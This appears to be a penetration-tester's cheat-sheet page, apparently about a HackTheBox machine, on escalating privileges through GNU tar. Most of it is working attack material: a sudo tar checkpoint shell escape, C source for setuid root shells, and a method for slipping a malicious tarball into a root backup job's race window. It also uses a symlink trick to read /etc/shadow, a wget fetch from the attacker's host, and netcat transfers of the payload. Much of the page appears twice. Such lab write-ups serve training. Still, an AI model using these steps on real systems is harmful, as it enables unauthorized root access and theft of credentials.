TAR backups

Easy PrivEsc

> whoami
www-data
> sudo -l
(sally) NOPASSWD: /bin/tar

> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
> whoami
sally

Backup Script Vulnerability

If root is doing anything as a job, you can attempt to re-direct it
Copy the script back to your host and decompose it for analysis
Examples of root running TAR:
- Extracting TAR

Just like NFS Root Squashing

Similar to "NFS Root Squashing" and the "jail" box
- Make setuid root owned
- gzip the setuid
- copy back inject into the 'temp' check folder
- root will extract to 'check' the files
- and thinks it belongs to him!

Backup Script Discovery

Works just fine as 'user'

cd /tmp
wget http://$MyIP:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

pspy32             ..get more details
locate backuperer  ..investigate

Backup Flaw Scenario

Backup script runs TAR as Root every 5 minutes
Deletes the previous checks: /var/tmp/.* and /var/tmp/check.
Creates a gzip file of the directory /var/www/html with user-perms
Saves it in the file /var/tmp/.randomsha1
Sleeps for 30 seconds.
Creates the directory /var/tmp/check
Extracts gzip with Root /var/tmp/.randomsha1 to /var/tmp/check
If /var/www/html is different from backup: /var/tmp/check/var/www/html
1. Report error.
2. Otherwise, move file /var/tmp/.randomsha1 to /var/backups/onuma-wwww-dev.bak
3. And delete 'check' directory and .randomsha1

Backup Flaw Exploit #1

Script design is to tar as user, then untar as root
Then compare previous version (which gives us 5 minutes)
We can inject our evil tar:
Script will: tar/copy/extract/compare.. and fail with error..
Giving us 5 minutes to use root-unzipped-files

Create the evil setuid

----------------------------
gcc        ..installed?
locate -r gcc$

kali:
uname -a   ..we have 32bit (should match target)
cp /opt/shells/setuid.c .

----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main ( int argc, char *argv[] )
{
   setreuid(0,0);
   execve("/bin/sh", NULL, NULL);
}

----------------------------
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

----------------------------
gcc 
apt search gcc-multilib

Compile
gcc -m32 -o setuid setuid.c   ..32 bit compile

TAR the evil suid

TAR embeds the userid that owns the file - in the actual archive
We create this file and TAR as root .. it will stay root when extracted

----------------------------
kali:

sudo -i                        ..do this work as root
mkdir -p var/www/html          ..mock directory
cp suid var/www/html
chmod 6555 var/www/html/suid   ..set the suid bit
chmod u+s var/www/html/suid    ..alternate
ls -la var/www/html/
tar -zcvf setuid.tar.gz var/   ..mock tar

send:
nc -nlvp 9002 < setuid.tar.gz


-----------------------
target:

> cd /var/tmp
> nc $MyIP 9002 > setuid.tzt.gz

> watch -n 1 'systemctl list-timers'
created '.6683a76af11'               ..temp extract
> cp setuid.tar.gz .6683a76af11      ..INJECTED !!!

> watch -n 1 'systemctl list-timers'
root extracts '.6683a76af11' to the 'check' folder
untar and diffs as 'root'

> cd check/var/www/html
> ls -la
rsuid owned by root and suid-bit-set !!

>./ rsuid
whoami root!

Backup Flaw Exploit #2

diff runs as root
updates to readable error file:
- /var/backups/onuma_backup_test.txt
tar an evil symlink that root will extract/diff

cd /var/tmp/var/www/html
ln -s /etc/shadow index.html      ..symlink
ln -s /root/root.txt index.html   ..alternate
cat index.html                    ..denied
cd /var/tmp
tar -zcvf symlink.tar.gz var/     ..mock tar

watch -n 1 'systemctl list-timers'
created '.17f6c199'               ..temp extract
> cp symlink.tar.gz .17f6c199     ..swap our evil-tar-sym

job will untar and diff as 'root'
> cat /var/backups/onuma_backup_error.txt
'shadow' !

REF

tartarHTB

PreviousShell TTY Fix NextTransfer Files

Last updated 2 years ago

Was this helpful?

> whoami www-data > sudo -l (sally) NOPASSWD: /bin/tar > sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh > sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash > whoami sally

Backup Flaw Scenario

Backup script runs TAR as Root every 5 minutes

Deletes the previous checks: /var/tmp/.* and /var/tmp/check.

Creates a gzip file of the directory /var/www/html with user-perms

Saves it in the file /var/tmp/.randomsha1

Sleeps for 30 seconds.

Creates the directory /var/tmp/check

Extracts gzip with Root /var/tmp/.randomsha1 to /var/tmp/check

If /var/www/html is different from backup: /var/tmp/check/var/www/html

Report error.
Otherwise, move file /var/tmp/.randomsha1 to /var/backups/onuma-wwww-dev.bak
And delete 'check' directory and .randomsha1

Create the evil setuid

----------------------------
gcc        ..installed?
locate -r gcc$

kali:
uname -a   ..we have 32bit (should match target)
cp /opt/shells/setuid.c .

----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main ( int argc, char *argv[] )
{
   setreuid(0,0);
   execve("/bin/sh", NULL, NULL);
}

----------------------------
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

----------------------------
gcc 
apt search gcc-multilib

Compile
gcc -m32 -o setuid setuid.c   ..32 bit compile

TAR the evil suid

TAR embeds the userid that owns the file - in the actual archive

We create this file and TAR as root .. it will stay root when extracted

----------------------------
kali:

sudo -i                        ..do this work as root
mkdir -p var/www/html          ..mock directory
cp suid var/www/html
chmod 6555 var/www/html/suid   ..set the suid bit
chmod u+s var/www/html/suid    ..alternate
ls -la var/www/html/
tar -zcvf setuid.tar.gz var/   ..mock tar

send:
nc -nlvp 9002 < setuid.tar.gz


-----------------------
target:

> cd /var/tmp
> nc $MyIP 9002 > setuid.tzt.gz

> watch -n 1 'systemctl list-timers'
created '.6683a76af11'               ..temp extract
> cp setuid.tar.gz .6683a76af11      ..INJECTED !!!

> watch -n 1 'systemctl list-timers'
root extracts '.6683a76af11' to the 'check' folder
untar and diffs as 'root'

> cd check/var/www/html
> ls -la
rsuid owned by root and suid-bit-set !!

>./ rsuid
whoami root!

Backup Flaw Exploit #2

diff runs as root

updates to readable error file:

/var/backups/onuma_backup_test.txt

tar an evil symlink that root will extract/diff

cd /var/tmp/var/www/html
ln -s /etc/shadow index.html      ..symlink
ln -s /root/root.txt index.html   ..alternate
cat index.html                    ..denied
cd /var/tmp
tar -zcvf symlink.tar.gz var/     ..mock tar

watch -n 1 'systemctl list-timers'
created '.17f6c199'               ..temp extract
> cp symlink.tar.gz .17f6c199     ..swap our evil-tar-sym

job will untar and diff as 'root'
> cat /var/backups/onuma_backup_error.txt
'shadow' !